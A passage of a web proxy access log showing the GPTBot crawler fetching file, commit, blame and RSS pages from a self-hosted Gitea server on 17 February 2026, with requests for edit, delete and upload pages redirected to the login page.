192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:43:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:43:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:43:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:43:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:43:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:43:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" -[17/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static" -[17/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10056] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" -[17/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 9836] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:43:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 11558] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 12174] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 11472] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:43:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 9813] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 11479] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 11753] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 11495] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 9827] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 9821] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:16:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 10657] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 9827] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 11436] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 915] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 917] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 588] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 10898] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:43:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 10586] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:43:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 413] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:43:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 